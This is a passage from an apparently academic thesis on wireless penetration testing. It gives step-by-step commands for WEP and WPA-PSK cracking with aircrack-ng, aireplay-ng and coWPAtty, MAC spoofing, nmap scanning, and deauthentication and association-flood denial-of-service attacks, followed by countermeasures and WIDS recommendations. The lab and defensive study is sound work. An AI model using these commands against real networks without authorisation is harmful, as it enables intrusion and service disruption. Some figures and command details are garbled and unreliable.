Netstumbler. Figure 3.2 shows all the access points broadcasting their SSID.
Figure 3.2 Access Point Broadcasting
There are 14 Active Access Points broadcasting near the range of the pen tester‘s
machine. The information gathered from NetStumbler is that there exists an unauthorized
“rogue” access point with a SSID of “testnetwork “, MAC address of 00:0F:66: DF:
87:45, the channel used is 6 and the vendor is Linksys. Furthermore, the speed is 11
Mbps and has no security in place. For an attacker this is the best scenario to get in since
there is nothing he will have to do besides connecting to the rogue access point and in
one step he is on the wired network bypassing all the security in place. All the security
measures such as firewalls, IDS, and routers are useless. The rogue access point will
serve as an entry door.
64
A security measure could be to disable the SSID from broadcasting. In this case
the employee does not want to be caught by the security manager. The pen-tester should
be aware of this. Figure 3.3 shows the output of Netstumbler with the Wireless Access
Point not broadcasting its SSID [Bayles 2007].
Figure 3.3 Output of Netstumbler
Netstumbler was not able to find the wireless access point with a SSID of
“testnetwork” whenever the AP it is not broadcasting its SSID. The reason is that
Netstumbler transmits a broadcast Request probe to discover the WLAN. Most access
points respond to a Broadcast Request by default. However, if the access point ceases to
respond to a request, Netstumbler can no longer detect it. It would be wrong to try only
with one tool. A rule of thumb is to try at least with two different tools.
65
The second tool selected is Kismet which is a Linux based tool, and it is included
in the Backtrack 3.0 Live CD. Figure 3.4 shows all the networks on the range of the pen-
tester using Kismet.
Figure 3.4 Access Point Broadcasting
By default kismet is in autofit sort mode. Unfortunately in this mode the
penetration tester cannot obtain a lot of information about the different access point
beyond the information displayed in the default view. To change the sort mode, press the
s key to bring up a menu of the sort options. Since the goal is to identify the networks that
are not broadcasting their SSID the penetration tester can sort by SSID by choosing the s
option.
66
Once the networks are sorted, there are two wireless access point (AP) that are not
broadcasting their SSID. To get additional information about those two networks. Using
the arrow keys, highlight the access point with no SSID and press Enter to get the
Network Details (Figure 3.5)
Figure 3.5 Network Details
In the network details, the penetration tester finds the MAC Address (Basic
Service Set Identifier [BSSID]) of the Wireless Access Point. Since the max rate is 11.00
Mbps the penetration tester can determine that it is an 802.11b Access Point operating in
infrastructure mode. Also, information about the manufacturer, which in this case is
Linksys, is displayed. Furthermore, although there is an indicator of whether the network
67
is encrypted or not in the main screen, this indicator does not identify the type of
encryption.
Yet, in the network detail the penetration tester can get the type of encryption in
place which in this case is none since there is no encryption. Once all this information is
reported, to return to the main menu just press the q key. Another feature of kismet is
that it allows the pen-tester to determine who is actually connected to a network. By
highlighting the access point and pressing the c key, the penetration tester is presented
with a list of any clients associated with the network. In client view, the penetration
tester can determine the MAC address of any clients associated with the access point.
Additionally, in some cases, the type of the card is displayed. The number of data packets
that Kismet has seen and the number of those packets that are encrypted are identified.
Once Kismet determines the Internet Protocol (IP) address of a specific client it is noted
as well as the strength of the signal [Bayles 2007].
This information is important to determine the people that in most cases are
breaking a rule by setting a rogue access point. With the MAC address a pen-tester can
review the hardware list of the company. Since the MAC address is unique in each
wireless card, the computer with that wireless card on it will be determined. By
determining the computer that has the wireless card the pen-tester can accurately find the
name of the employee who is using the rogue access point. Once the pen-tester has
determined the existence of a rogue access point and since the AP has no security enable,
the pen-tester now has access to the wired network. Indeed, all the security measures are
useless with the rogue access point in place.
68
3.1.1 Cracking WEP
The second scenario was having the Access Point with the WEP encryption
method enable. The purpose of this scenario was to test the WEP cracking tools. As
mentioned before the tools used to crack WEP were the Aircrack-ng Suite and WEP
crack. Yet, before proceeding any further it was important to verify that the computer
used was able to capture traffic. For this, the wireless card has to be configured with the
correct drivers. In order to test whether the wireless card is configured or not the Airmon-
ng script was used. The Airmon-ng script places the interface in monitor mode. If it is
not possible to start the interface in monitor mode, there are problems with the drivers of
the wireless card. One of the disadvantages of using Backtrack from a live CD is not
being able to write to the CD. So every time that Backtrack is loaded the pen-tester needs
to install the correct drivers. Once the interface is set in monitor mode the penetration
tester can start capturing packets.
Although any packet analyzer capable of writing cap format can be used, the
Airodump-ng tool was used because it is included in the Aircrack-ng suite. By default,
Airodump-ng hops on all channels; however, there is an option to lock to a specific
channel if desired. The command used to set Airodump-ng was:
airodump-ng --channel 6 --write test -b 00:16:B6:6C:CD:92 wifi0
• --channel specifies the channel to lock on. The access point was working on
channel 6.
• --write to write the packets into a file which in this case is test. cap
• -b is the BSSID of the access point.
• Wifi0 is the interface used.
69
Airodump-ng shows the number of packets and IVs that have been collected, as
well as all the stations connected to the Access Point as shown in figure 3.6.
Figure 3.6 Airodump-ng Captures Packets
After using Airodump-ng to determine an allowed MAC address which in this
case was 00:18:E7:1D: EF: CD, it was necessary to change the MAC address because
whether MAC address filtering is used as an ineffective security mechanism, penetration
testers need to be able to spoof MAC addresses. Backtrack provides a mechanism to
accomplish this, called macchanger. The command line used to change the MAC address:
macchanger –m 00:18:E7:1D: EF: CD wifi0
• -m to set a manual MAC
• 00:18:E7:1D: EF: CD is the MAC address of the station that is allowed to
connect.
• Wifi0 is the interface whose MAC address is going to be changed.
70
Once the MAC address was successfully changed, the next step was to generate
enough packets to crack WEP. Since only one station was connected to the Access Point
it would have taken too much time until the station connected would have generated the
packets needed. The used to inject packets was Aireplay-ng which is also included in the
Airocrack-ng suite.
Aireplay-ng has different types of attacks that can be used to inject packets. The
two most commons are the ARP request attack, and the packet replay attack. These two
attacks where used. The first attack needs to gather an ARP packet to replay that ARP
packet. The command line used:
aireplay-ng -3 –e testnetwork –b 00:12:17:9E:85:C7 –h 00:18:E7:1D: EF: CD wifi0
• -3 is the ARP replay attack.
• -e is the ESSID of the access point.
• -b is the MAC address of the access point.
• -h is the MAC address of the source wireless interface.
• Wifi0 is the interface
The attack starts reading packets and capturing ARP request packets as shown in
figure 3.7. It uses these packets to replay back to the access point. The access point
generates a respond for each packet received. Each packet generated by the access point
has a different IV number.
71
Figure 3.7 Aireplay-ng starting to inject packets
The number of packets started to increase dramatically once the attack was in
progress. The number of packets sent by the station with MAC address of 00:18:E7:1D:
EF: CD increased. The penetration tester can verify this by returning to the Airodump-ng
window. The #Data column was rising quickly, and #/s column showed the rate of
injection.
The other way to generate traffic is by injecting normal packets instead of ARP
packets. The reason for using this attack is to avoid a Wireless Intrusion Detection
System that could be monitoring the wireless network. The command line used:
aireplay-ng -2 –b 00:21:29:CA:BA:62 –d FF:FF:FF:FF:FF:FF wifi0
• -2 is the Packet replay attack.
• -b is the MAC address of the access point.
• -d is to broadcast to all the station connected to the network.
• Wifi0 is the interface
72
Figure 3.8 The packet replay’s attack
The same as with the ARP packet replay attack, the number of packets started to
increase dramatically. The final step was to create one last window and run Aircrack-ng:
aircrack-ng –b 00:12:17:9E:85:C7 test-01.cap
• -b selects the target AP.
• Test-01.pcap is the name specified when starting Airodump-ng.
In Aircrack-ng version 1.0 the default attack used to crack WEP is the PTW
attack which decrypts the key faster than previous attacks. Regardless of the method by
which WEP is cracked, once found the key is displayed in hex format (Figure 3.9). In this
case the key was found with 9978 IVs. With the key the pen-tester can connect to the
wireless network and then to the wired network.
73
Figure 3.9 Aircrack-ng displaying the Key
3.1.2 Cracking WPA-PSK
The third scenario was having a wireless network encrypted with the WPA-PSK
encryption method. The passphrase used was eight-character long without any special
symbol. In this case, the techniques considered were: WPA dictionary attacks, brute force
attacks. The tools used to crack WPA were CoWPAtty, and Aircrack-ng 1.0. These two
tools are included with the Backtrack Live CD.
The first step was to capture the four-way EAPOL handshake using Airodump-ng
since it was already working. In order to get these four packets a deauthentication attack
was performed using aireplay-ng. The command used:
aireplay-ng -0 1 –a 00:12:17:9E:85:C7 –c 00:18:E7:1D: EF: CD wifi0
• -0 specifies the deauthentication attack.
• 1 is the number of deauthentication packets to send; 0 is continuous.
• -a is the MAC address of the Access Point.
74
• -c is the MAC address of the client to deauthenticate; if left blank, all clients are
deauthenticated.
• Wifi0 is the interface.
A deauthentication attack will probably alert any wireless Intrusion Detection
System (IDS). If the idea is not to be detected the penetration tester will have to wait until
the EAPOL handshake occurs naturally. Upon reauthentication, the four-way handshake
is transmitted and captured with Airodump-ng. With the file of the four-way handshake
collected with Airodump-ng and the file of the precomputed table that contains the SSID
of the wireless access point the next step was to start CoWPatty. The command used:
cowpatty –f password.txt –r wpa-01.cap –s testnetwork
• -f is the wordlist.
• -r is the file with the four way hand shake.
• -s is the SSID of the Access Point.
In this case, the passphrase was in the dictionary file so coWPatty was able to
process and find the key in a short period of time. Figure 3.10 shows the process of
searching.
75
Figure 3.10 shows the process of searching
It is important to mention that although cracking WPA/WPA2 – PSK seems to be
easer than cracking WEP, WPA/WPA2 – PSK relies on brute force and dictionary attacks
which are sometimes computationally infeasible. With an appropriate key length the
penetration tester can make these two methods less effective. For example with an eight-
character long key only using 62 characters (alphanumerical characters), the total key
space or the dictionary needed for an eight-character password is in excess of 218 trillion
which is far beyond any current storage capabilities. Furthermore, coWPatty can only try
30-60 words per second with 218 trillion possibilities it could take years to try all the
possibilities.
76
3.2 Internal pen-test lab
In this lab the goal was to use enumeration tools and address the most common
configuration flaws. Furthermore, to deploy denial of service (DoS) and man in the
middle (MITM) attacks. The layout of this lab is:
Figure 3.11 Network Layout
3.2.1 Enumeration Attacks
The first tool used was Nmap, and the command used was:
nmap –T –sV –v –O 192.168.1.1-254
• -T to set the timing and performance. Higher is faster.
• -sV Type of scan.
• -v to increase the verbosity level, causing Nmap to print more information about
the scan in progress.
• -O enables OS detection.
Figure 3.11 shows Nmap running.
77
Figure 3.11 Nmap executing
On the left hand side of the window, Nmap displays all the devices that belong to
the wireless network and were live at the moment of the scanning. Table 3.1 is a
summary of Nmap results.
Table 3.1 Nmap Results
IP Address Mac Address Card Brand Ports Open OS
192.168.1.1 00:12:17:9E:85:C8 Cisco-Linksys 80 Router
192.168.1.101 00:14:22:4A:FC:20 Dell 135,139,445 Windows
192.168.1.102 00:18:E7:1D:EF:CD Cameo 135, 139, 3389 Windows
192.168.1.106 00:14:22:4A:CF:6E Dell 135, 139, 445 Windows
192.168.1.107 00:01:03:1C:A3:89 3com 22, 111, 933 Linux
192.168.1.108 00:01:03:1C:A3:B4 3com 22, 631 Linux
192.168.1.109 00:01:03:1C:B5:0C 3com 135, 139, 445, 1025 Windows
192.168.1.111 00:01:03:1C:B5:0C 3com None None
78
By default, Nmap 4.20 with Backtrack scans 1,697 ports for common services.
This will catch most open TCP ports that are out there. However, sometimes system
administrators may run ports on uncommon ports, practicing security through obscurity.
Without scanning those uncommon ports, the penetration tester may be missing these
services. In order to run Nmap to scan for all those ports the –p0 -65535. However, this
type of scan takes a long time. All this information is used to exploit vulnerabilities on
the services, or ports. It is out of the scope of the project to exploit vulnerabilities in open
ports or services with default configuration.
However, in order to prevent hackers from exploiting vulnerabilities, there are
several tools that allow the system administrator to assess the security on all the stations
connected to the network. One of the most common is GFI LANguard Network Security
Scanner. This tool check databases based on OVAL and SANS Top 20, providing over
15,000 vulnerability assessments when the network is scanned. Also, LANguard gives
the penetration tester the information and tools needed to perform multi-platform scans
across all environments. The goal is to analyze the network security health and
effectively install and manage patches on all stations across different operating systems
[Bayles 2007].
79
3.2.2 Denial of Service Attacks
As mentioned before, wireless networks are very vulnerable to this type of attacks
due mainly for two reasons. The first one is the lack of frame authentication in 802.11
management frames such as beacons, association requests, and probe responses. The
functionality inherent in the MAC layer of a 802.11 network allows wireless systems, to
discover, join, and roam free on the network, completely exposed to the elements. This
implicit trust among wireless devices makes it easy for an attacker to bring down
individual hosts, or even an entire wireless network [Bellardo 2003].
There are many different types of Denial of Service attacks (DoS) which can
impact radio signals, network protocols, and even wireless applications. The attacks
performed in this project were the deauthentication and the authentication attacks. A
deauthentication attack puts the client in a state of complete disconnection. The tool used
was Aireplay-ng. The command line used:
aireplay-ng -0 1 00:12:17:9E:85:C7 wifi0
• -0 specifies the deauthentication attack.
• 0 is the number of deauthentication packets to send; 0 is continuous.
• -a is the MAC address of the Access Point.
• -c is the MAC address of the client to deauthenticate; if left blank, all clients are
deauthenticated.
• Wifi0 is the interface.
80
All the stations connected to the Access Point were deauthenticated and because
aireplay-ng continued to send deauthenticate packets no one was able to reconnect to the
access point. The second attack exploits a weakness in the way access points queue
incoming client requests. These requests are stored in the client association identifier
table (AID). The AID table can only handle a limited number of wireless client
connections. Once this memory is filled, most APs will no longer accept incoming
association requests. One of the most common tools to create an association flooding
attack is Void11.
The command used was:
void11_penetration wifi0 -D -s 3 -s -S testnetwork -B 00:12:17:9E:85:C7
• Wifi0 is the interface.
• -s is the association flood attack.
• -S is the SSID of the Access Point.
• -B is the BSSID of the Access Point.
This attack overloaded the AID table within seconds, making the AP to freeze.
81
4. EVALUATION AND RESULTS
Once the penetration testing has finished the next step is to report the findings
with all those with an interest, such as network administrator, and manager. The reporting
phase is as important as the testing itself. Writing a great report requires a great deal of
effort, sometimes it can take three times as long as the work itself. The report shows the
completeness and rigor of the pen-tester’s testing methodology. The report should include
the following sections [Bayles 2007]:
• Executive Summary
• In scope, and Out of Scope Statements
• Objectives
• Nature of Testing
• Analysis
• Summary of Findings and Vulnerability Summary
• Countermeasure(s) to Control de Vulnerability
• Conclusion
• Supporting Documentation
Many organizations make the major mistake of not following up swiftly. It is one
thing to identify vulnerabilities; it is another thing altogether to fix the problem.
Companies are in worse legal position if they do not fix known problems than if they do
not know about the problems. Furthermore, if companies follow up with delays, they also
risk the money and time spent on the test itself [Bayles 2007].
82
4.1 External pen-test lab
4.1.1 First Scenario
The first vulnerability found was the rogue access point (AP) discovered with no
security. The access point was connected to the main wired network creating a back door
to any malicious hacker. Furthermore, the AP made all the others security measures
useless. Most of the time there exists a policy or rule that prohibits connecting any device
with out the consent of the security manager; however it is not only matter of
establishing a policy, there have to be controls to assure that the policy is being followed
by all the employees. Also, security it is not only matter of the security manager, it
involves all the employees in the company. It has been reported that the majority of
successful attacks were due to the human factor. The countermeasures to avoid and
eliminate this vulnerability are [Bayles 2007]:
• Using active and passive scanner tools to identify possible illegal access points.
• Keeping employees inform about the security issues of new technology.
As demonstrated hiding the SSID of the access point is not an effective security
measure. Using tools such as Kismet, Airodump-ng the malicious hacker can easily find
the access point.
4.1.2 Second Scenario
In the second scenario the vulnerability found was the use of WEP encryption
method. The WEP encryption method was easily broken. Table 4.1 shows the amount of
time and number of packets needed to crack both WEP 64 bits and 128 bits.
83
Table 4.1 Cracking WEP
WEP Number of Packets
Time to Decrypt (sec)
64 15,000 5
128 70,000 10
Having tools to inject packets to a wireless network makes the process of cracking
WEP even easier for malicious hackers. They do not need to wait until associated users
generate the amount of packets needed to crack WEP; they can generate traffic and
within seconds crack the encryption method. The countermeasures to this vulnerability
are [Bayles 2007]:
• Not using the WEP encryption method anymore. There are other methods more
secure.
• Using a Wireless Intrusion Detection System (WIDS) to monitor the air space and
detect whenever the malicious hacker is injecting packets.
Wireless Intrusion Detection System in their simplest form are designed and built
to monitor and report on network activities, or packets, between communicating devices.
The most common WIDS are AirMagnet Distributed 4.0, AirDefense Enterprise V4.1 or
the Red-M’s set of products. AirMagnet sensors report network performance information
and alerts to a management server within a SQL database, which is monitored through a
management console. One of the most important features is the ability to identify and
give aliases to various wireless MACs, thus making it easier to identify all actual users
and illegal users. By using the Find tool the security manager can manually and
physically track down the location of the rogue user. Furthermore, AirMagnet will even
pick up DoS attacks as they happen. Administrator can disable a site and re-address it,
and if the attacker is nearby potentially track him down [Broadcom 2006].
84
AirDefense system consists of a server running Linux with distributed wireless
AP sensors and a Java-based Web Console. AirDefense’s strong suit is its policy-based
approach to monitoring wireless devices and traffic. There are four main categories for
policies: configuration, performance, vendor, and channel. All of the policy thresholds
are configurable. For instance, if the company allows only Cisco NICs, then all other
NICs could be excluded so that a non-Cisco NIC would immediately trip an alarm
[Broadcom 2006].
The Red-M set of wireless security products includes Red-Alert and Red-Vision.
Red-Alert is a standalone wireless probe which can detect unauthorized 802.11 a/b/g
networks. Red-Vision has three components. Red-Vision server is the heart of Red-
Vision and contains both the intra-process communications engine and the internal
standards compliant database. Red-Vision Laptop Client is the agent installed on every
laptop computer connected o the wireless network. It collects data from the end user and
also monitors the hardware use. Red-Vision Viewer is a geographic based interface,
which is unique, since no other wireless software product can offer the wireless network
administrator this much control. Also, Red-Vision viewer provides control over every
separate device/appliance/ hardware type that connects to the network no matter how
many different pieces of equipment make up the wireless environment [Broadcom 2006].
85
4.1.3 Third Scenario
In the third scenario the vulnerability found was the use of an eight-character
passphrase to generate the WPA/WPA2 key. It was possible to crack WPA/WPA2
encryption method because of the length of the passphrase which was too short. For
instance, using a passphrase of twenty characters long where the characters are
alphanumeric values only (62 characters). A brute force attack will have to try 104, 857,
600, 000, 000, 000, 000, 000, 000 times. If CoWPatty can only tries 60 words per second
it will take 55, 416, 878, 065, 279, 891 years to try all possible words. WPA/WPA2 –
PSK it is a good choice for SOHO environments. As proven it is computational infeasible
to crack this encryption method when using long passphrases. For enterprises the best
option is WPA-RADIOUS which has not been cracked yet.
4.2 Internal Pen-Test lab
4.2.1 Vulnerability Assessment
In order to detect and eliminate possible vulnerabilities there exist tools such as
Nessus. Nessus is proprietary comprehensive vulnerability scanning software. It is goal is
to detect potential vulnerabilities on the tested system. For example:
• Vulnerabilities that allow a remote attacker to control or access sensitive data on a
system.
• Misconfiguration such as open mail replay or missing patches.
• Default passwords, and blank/absent passwords on system accounts.
86
Although the stations used in this lab did not have many services or ports open
because none of these stations were servers. One of the most important rules for
hardening a host system is the concept of minimization. Only essential applications and
operating system components should be loaded on host systems. Software vulnerabilities
account for a large percentage of the security incidents that occur. Thus, the less software
on a host generally equates to less exploitation of software vulnerabilities. Another
common rule is the isolation of services. It is best to isolate services such as email, www,
and ftp on separate physical systems. This way, if a service is exploited by an intruder,
the potential impact on the critical service would be limited [CERT 2003].
4.2.2 Denial of Service Attacks
There are several procedures that a security manager can do to protect his systems
from a DoS attacks. Many of these are free and relatively simple. It is important to
determine what is normal in the wireless network. For example [Beaver 2005]:
• Protocols in use
• Minimum, maximum, and average number of connections
• Minimum, maximum, and average throughput
• RF signal strength
• Any notable RF interference
• Number of Users
This information is invaluable when a security manager is trying to determine
whether a Denial of Service attack is about to occur, is occurring, or has already
occurred.
87
Another tool to prevent or detect DoS attacks is the use of wireless intrusion detection
system (WIDS). A WIDS looks for [Beaver 2005]:
• Unauthorized MAC addresses
• Unauthorized broadcast traffic
• Jamming
• Association floods
• Authentication floods
• Disassociation attacks
• Deauthentication attacks
88
5. FUTURE WORK
Security threats are an ever increasing problem to modern computing
infrastructures. Attempts to characterize the security of a large networked system are the
focus of several ongoing research efforts. One approach is to perform penetration testing
of an actual system manually by Red Teams. Such approach generates only one of what
may be many attack paths through a system [Broadcom 2006]. The current practice on
security only focuses on specifics, such as firewall testing, web server testing, and etc. On
the other hand, the other approach is to create a formal model of the system and then
obtain comprehensive security metrics by analyzing the models. The most common
methodology used by pen-tester is the Open-Source Security Testing Methodology
Manual (OSSTMM) 2.1 created by Pete Herzog. However, this methodology does not
encompass all the security issues related to wireless networks since it is intended to be a
guide for wired networks [Beaver 2005]. Thus, the need for research in this field is
required to produce a generic model that can be used as a basic guideline when doing
wireless penetration testing.
Another field of research is the one related to Wireless Intrusion Detection
Systems which is a countermeasure to all the already explained security flaws in the
wireless networks. To be effective, WIDS must be run online, in real time because
although offline, or after the event IDS are useful for audit trail, this type of IDSs will not
prevent an attack taking place. Real time IDS needs to be able to stream data across a
network from sensors to a central point where it can be stored, analyzed. This additional
network traffic running concurrently can significantly impact network performance so
sufficient bandwidth is a prerequisite [Broadcom 2006].
89
Furthermore, today’s wireless intrusion detection systems such as AirDefense
Guard or AirMagnet Distributed; utilize a misuse, signature, based IDS which has the
drawback of only being as good as the signature files and known attack pattern
recognition files given to them. The problem is that the wireless network using this
security tool has protection against what are known to be attacks. The new attacks will be
the one that gets the wireless network. This underlines the need to have an efficient
mechanism for keeping all network security components with rule or signature based
tables up to date [Broadcom 2006].
Another field of research is the use of neural networks in wireless intrusion
detection systems since a neural network is the solution to the problem of determining
what normal traffic is. A neural network is a mathematical model based on biological
neural networks. They can be used to model complex relationships between inputs and
outputs or to find patterns in data. One of the biggest advantages of neural networks is the
possibility of learning.
90
6. CONCLUSION
With the emergence of network globalization and advent of Internet being the
major tool for international information exchange and platform for the future, security
has always been the most talked about topics. It is clear that wireless solutions are
transforming the way people work and live. Using wireless enabled devices, it is already
possible to access the internet from public areas such as coffee shops, hotels and
motorway rest stops. All of this is possible through the use of Wireless Local Area
Networks (WLANs). Large Businesses are starting to wake up to the productivity
benefits and cost advantages of WLAN. Furthermore, the development of affordable
products and services has allowed small to medium businesses to invest in the
deployment of WLAN.
As with all networks, wired or wireless, the security threats are numerous but with
WLAN the security manager has to look at these security threats in a different way. The
physical medium on which wireless network transport data is like having network cables
running outside the perimeter of the building. The bottom line is that wireless
networking, as a new technology, needs new security controls to secure it. Wireless
Penetration Testing is a new methodology to address the security of 802.11 wireless LAN
networks.
91
Wireless Penetration testing has been determined to be the most effective way to
find exploits and to proof whether a system is vulnerable. Also, it often allows the
security analyst to find new vulnerabilities. Penetration testing should play a role in every
company’s network security policy. It gives a bird-eye perspective on current security. It
also, helps to identify what is the information that is exposed to the public or the Internet
world. By making up attack scenarios to best closely model all possible situations,
wireless penetration testing helps to identify and narrow down security risks.
Furthermore, it also helps to identify overlooked areas in sense of security and allow
customers to improve their current systems.
The results of the wireless penetration tests have demonstrated that one of the
major security flaws in the wireless networks is the use of the Wired Equivalent Privacy
(WEP) encryption method. It has been proven that this encryption method it is easily
cracked with tools such as Aircrack-ng and Wepcrack. It is only matter of gathering a few
thousands packets and these tools will easily crack the WEP key within seconds. Also, if
there is not much traffic being generated there are tools such as Aireplay-ng and
Packetforge-ng that can generate and inject packets so that the Access Point generates the
necessary number of IVs to crack the WEP key.
Even worse is that there are still many access points with no encryption method
in place. Also, hiding the SSID it cannot be considered as a security measure because
there are tools that can gather information of the access point even when the access point
is not broadcasting its SSID. Furthermore, the MAC address filtering is not a security
measure as well since as already shown tools such as Airodump-ng, Kismet, Wireshark
can easily get the MAC address of authorized users.
92
A solution for SOHO users to the encryption problem is the use of WPA with a
passphrase of twenty characters or longer. The passphrase should include special
characters, upper case characters and not typical words that can be found in a dictionary.
A solution of big enterprises is the use of WPA-RADIOUS. This technology has been
proven to be secure, and so far there has not been any exploit found.
Finally, a security measure to detect attacks such as enumeration, Denial of
Service, and man in the middle is a wireless intrusion detection system (WIDS).
Knowing what it is normal is crucial. Every security manager should gather from the
wireless network at least the protocols in use, the minimum, maximum and average
number of connections, the average throughput, and the numbers of users. This
information is the baseline to understand what is right and what is wrong in the wireless
network. WIDS technology is moving toward the use of neural networks and fuzzy logic
to define what normal traffic is and to defend the wireless network from new intrusion
types.
In conclusion, penetration testing is a good method for finding holes and security
flaws in all systems of an organization. However, organizations should always realize the
limitations of penetration testing. The results of a test only provide a snapshot of a
system’s security at a given time and it is only as good as the tester conducting it. New
vulnerabilities appear frequently and regular testing needs to be undertaken.
93
BIBLIOGRAPHY AND REFERENCES
[Arbaugh 2003] Arbaugh W.A., “Wireless security is different” IEEE: Computer
Volume: 36, Issue: 8 pp. 99 – 101 Aug. 2003
[Arbaugh-Shankar 2001] Arbaugh W.A., N. Shankar, and J. Wang, "Your 802.11
Network Has No Clothes," Proc. 1st IEEE Int"l Conf. Wireless LANs and Home
Networks, IEEE Press, 2001, pp. 131–134.
[Bayles 2007] Bayles Aaron, Butler K. and Collins A. Penetration Tester’s Open Source
Toolkit. Syngress Publishing, 2007.
[Beaver 2005] Beaver, K and Davis, P. Hacking Wireless Networks for Dummies. Wiley
Publishing, Inc., 2005.
[Bellardo 2003] Bellardo J. and Savage S., "802.11 Denial-of-Service Attacks: Real
Vulnerabilities and Practical Solutions," Proc.12th Usenix Security Symp., Usenix
Assoc., 2003, pp. 15–28
[Broadcom 2006] Broadcom Corporation. 802.11n: Next-Generation Wireless LAN
Technology. Available from www.broadcom.com/docs/WLAN/802_11n-WP100-R.pdf
[Cam-Winget 2003] Cam-Winget N., "Security Flaws in 802.11 Data LinkProtocols,"
Comm. ACM, vol. 46, May 2003, pp. 35–39.
94
[CERT 2003] CERT/CC Training and Education Center, Advanced Information
Assurance. November 2003, pp. 14-50.
[Chinitz 2007] Chinitz L. Interference Immunity of 2.4 GHz Wireless LANs. Available
from http://www.hometoys.com/htinews/aug01/articles/immunity/immunity.htm (Visited
August 2008).
[Hassell 2004] Hassell, J., Wireless Attacks and Penetration Testing. Home Page.
Available from www.securityfocus.com/infocus/1785 (visited March. 2, 2008).
[Housley 2003] Housley R. and Arbaugh W., "Security Problems in
802.11-based Networks," Comm. ACM, vol. 46, no. 5, 2003,pp. 31–34.
[Hurley 2007] Hurley C. and Thornton F., WarDriving & Wireless Penetration Testing.
Syngress Publishing, Inc., 2007.
[INSIGHT 2008] Insight Consulting. Home Page. Available from www.insight.co.uk/
(visited March 27, 2008).
[ISS 2008] Internet Security Systems, Penetration Tests: The Baseline For Effective
Information Protection. Available from
http://ww.iss.net/documents/whitepapers/pentestwp.pdf. pp. 2-4. pp. 2-4.
95
[Kowalski 2006] Kowalski M.B., Bertolino K.D; and Basagni S., “Hack Boston:
Monitoring Wireless Security Awareness in an Urban Setting” Canadian Conference on
Electrical and Computer Engineering, 2006. CCECE '06. May 2006 Page(s):1308 – 1311.
[Kruse 2002] Kruse, W. and Heiser, J. Computer Forensics: Incident Response
Essentials. Addison-Wesley, Lucent Technologies, 2002.
[Miller 2001] Miller S.K., “Facing the Challenge of Wireless Security.” IEEE Computer
Volume: 34, Issue: 7 pp. 16 – 18. July 2001
[Nichols 2002] Nichols, R and Lekkas, P. Wireless Security. Mcgraw-Hill, 2002.
[Puneet 2008] Puneet M. Guide to Penetration Testing. Available from
http://searchnetworking.techtarget.com/general/0,295582,sid7_gci1083719,00.html
(visited May 2, 2008).
[Stephen 2006] Stephen, N and Shenk, J. Penetration Testing: Assessing Your Overall
Security Before Attackers Do. SANS Analyst Program.
[Siles 2007] Siles, R. Wireless forensics: Tapping the Air I. Home Page. Available from
www.securityfocus.com/infocus/1884 (visited Feb. 22, 2008).
96
[Siles 2007] Siles, R. Wireless forensics: Tapping the Air II. Home Page. Available from
www.securityfocus.com/infocus/1885 (visited Feb. 22, 2008).
[Tamini 2006] Tamimi A. Security in Wireless Data Networks: A Survey Paper.
Available from http://www.cs.wustl.edu/~jain/cse574-06/ftp/wireless_security/index.html
(visited September 2008).
[Turnbull 2007] Turnbull B. and Slay J. Wireless Forensic Analysis Tools for use in
Electronic Evidence Collection. IEEE Comput. (Feb 2007).
[VAC 2008] Vulnerability Assesment Co. Home Page. Available from
www.vulnerabilityassessment.co.uk/ (visited March. 5, 2008)
[Vladimirov 2004] Vladimirov, A. and Gavrilenko, K. Wi-Foo: The secret of Wireless
Hacking. Addison-Wesley, Pearson education. 2004.
[Walker 2000] Walker J.R., Unsafe at Any Key Size: An Analysis of the WEP
Encapsulation, IEEE 802.11 Task Group E IEEE 802.11/00-362, Oct. 2000,
http://grouper.ieee.org/groups/802/11/Documents/DocumentHolder/0-362.zip. (visited
May 12, 2008
[WildPackets 2008] Wild Packets Inc. 802.11 WLAN Packets and Protocols. Available
from http://www.wildpackets.com/support/compendium/manual_appendices/overview
(Visited August 2008).